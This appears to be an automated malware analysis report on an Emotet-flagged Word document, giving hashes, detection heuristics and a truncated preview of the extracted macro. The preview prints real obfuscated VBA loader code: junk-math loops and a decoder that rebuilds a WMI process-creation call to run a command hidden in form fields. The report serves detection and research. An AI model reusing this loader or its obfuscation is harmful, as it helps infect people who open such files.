Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e5cbfe8d86a3f6d2…

MALICIOUS

Office (OLE)

152.5 KB Created: 2019-09-23 06:57:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 9c39aa128fe28cd0d494df048648872d SHA-1: b308d6f1006cb419985b1777e50bfd1557b988a8 SHA-256: e5cbfe8d86a3f6d2ada09a8f480727cfeddbe53c3926c84c10a4bf368f927059
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample exhibits critical heuristic firings for an obfuscated auto-exec VBA loader that uses CreateObject and execution sinks, consistent with Emotet's typical behavior. The ClamAV detection explicitly names Emotet. The VBA macro is heavily obfuscated, but the presence of autoopen and CreateObject calls indicates it is designed to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7178007-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7178007-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29327 bytes
SHA-256: 769eb342e96993c83aecc7730eb3c876613cd30de03079cddb6789312f462f92
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Twl6jjzj, 0, 0, MSForms, TextBox"
Attribute VB_Control = "ld4CCGZ, 1, 1, MSForms, TextBox"
Attribute VB_Control = "wIzXHGzi, 2, 2, MSForms, TextBox"
Attribute VB_Control = "WftjwJSv, 3, 3, MSForms, TextBox"
Attribute VB_Control = "H85tHVX, 4, 4, MSForms, TextBox"
Attribute VB_Control = "BmWDjUE, 5, 5, MSForms, TextBox"
Attribute VB_Control = "GaUqEW, 6, 6, MSForms, TextBox"
Attribute VB_Control = "XdiYh8, 7, 7, MSForms, TextBox"
Attribute VB_Control = "YUEbJOu0, 8, 8, MSForms, TextBox"
Attribute VB_Control = "ti18PAc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "qZw9Lksz, 10, 10, MSForms, TextBox"
Attribute VB_Control = "rjFD_c_, 11, 11, MSForms, TextBox"
Attribute VB_Control = "j0IJ6iN5, 12, 12, MSForms, TextBox"
Attribute VB_Control = "aLPz1dFr, 13, 13, MSForms, TextBox"
Attribute VB_Control = "nDHh05D3, 14, 14, MSForms, TextBox"
Attribute VB_Control = "ojlZV0j, 15, 15, MSForms, TextBox"
Attribute VB_Control = "SUcYjLw4, 16, 16, MSForms, TextBox"
Attribute VB_Control = "zk1c35, 17, 17, MSForms, TextBox"
Attribute VB_Control = "CtMQXwj, 18, 18, MSForms, TextBox"
Attribute VB_Control = "u5diCCfC, 19, 19, MSForms, TextBox"

Attribute VB_Name = "oYitPl7"
Function wZi6skaB()
   On Error Resume Next
   Do
      If FRB8CKU5 = IUIQzn Then
         zSQUYLj = UmAiaCP _
         - Hex(957 + Oct(532 / Round(334))) _
         + 979 - Fix(wPBR7i) - 787 - Ej72iR_A _
         - iw42YC * Sin(OwlvR58u)
         cqXsYk = Tan(289)
      End If
         Dl6UAd = diLI2_j_ _
         * Round(LURC5u) / Xku9YSuY / B8vIkV + (cjKjGXa _
         / Sin(ntCsKrC) / 212 * Sin(KlJ4YdB))
      For Each QaFv8sfL In udWhL80p
         sPtI0It = GshqaGwR * Round(QM0kOGI2) _
         / zZwGAGEr / q_PjAGXw + (Tp04mO4 / Sin(B1RpRts) _
         / 945 * Sin(hTCGUN9))

      Next
Loop Until YkHtV5nl = wizOYM6
zdJirMzZ = QYSPt_aX + RwEAZfP(ThisDocument.nDHh05D3 + ThisDocument.XdiYh8) + QN_6PLz
   On Error Resume Next
   Do
      If nY7jiST = XhTIzWfn Then
         SRWDwwRr = Oqw6si _
         - Hex(854 + Oct(510 / Round(307))) _
         + 436 - Fix(Hj6MDi) - 910 - HBj81X _
         - wQZVHt * Sin(hZhzvZa)
         Zic1JO3 = Tan(831)
      End If
         hQKtf5Yj = Ek5ZTTi _
         * Round(fTulNiW4) / oChqXE8 / vnYPb0O4 + (Hjlk7D _
         / Sin(i9OIBjFL) / 357 * Sin(uhUX4nt))
      For Each DTm0mz In vLdmn8KQ
         om1KPlq0 = oo02m1Wl * Round(fWN4KA68) _
         / IGZ78sY / BTotD5 + (j_zkkN / Sin(WZ8_Oq) _
         / 585 * Sin(YkrOD55c))

      Next
Loop Until Bq0nJ04 = zi_k46

CreateObject(RwEAZfP("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create zdJirMzZ, Q3Zj5w2, trYYzNbS, wMIGiH
   On Error Resume Next
   Do
      If Vt9VjUk = mCbjNRv Then
         EmcGPbrh = PrRXmNVG _
         - Hex(340 + Oct(256 / Round(607))) _
         + 761 - Fix(R1SNLV) - 390 - ZPhpK4 _
         - AUijo0 * Sin(Czdp1W4K)
         iQUP66t = Tan(11)
      End If
         QNojYz = AnLkWD _
         * Round(T3DbHX) / fST1wak / wcmZTF + (J3h3_ON _
         / Sin(cCp078) / 391 * Sin(vFdmal))
      For Each Sam2vDz In zfztmD
         j3hIQAjv = zYwvQii * Round(fAUiQi60) _
         / QTCXnt / NGaFGZq + (OMPVP0Qj / Sin(UQoVBFs) _
         / 356 * Sin(zBJBh9))

      Next
Loop Until Tf67wir = JrEVz2pW

   On Error Resume Next
   Do
      If fofhqZp = c3ZICNo Then
         vwQT6ubP = sXILR_U2 _
         - Hex(207 + Oct(361 / Round(258))) _
         + 343 - Fix(hoPBVCDV) - 574 - qfsqdFY _
         - nFbb8BIZ * Sin(HtXhdC)
         M04rG6X = Tan(420)
      End If
         jctMmCI = LNTANnWN _
         * Round(X0OoMhJT) / wjDCqc / wirOLlzD + (nQU5tf _
         / Sin(XzjqcuS) / 845 * Sin(kKQVwqYR))
      For Each LznzJR In duEzimS
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.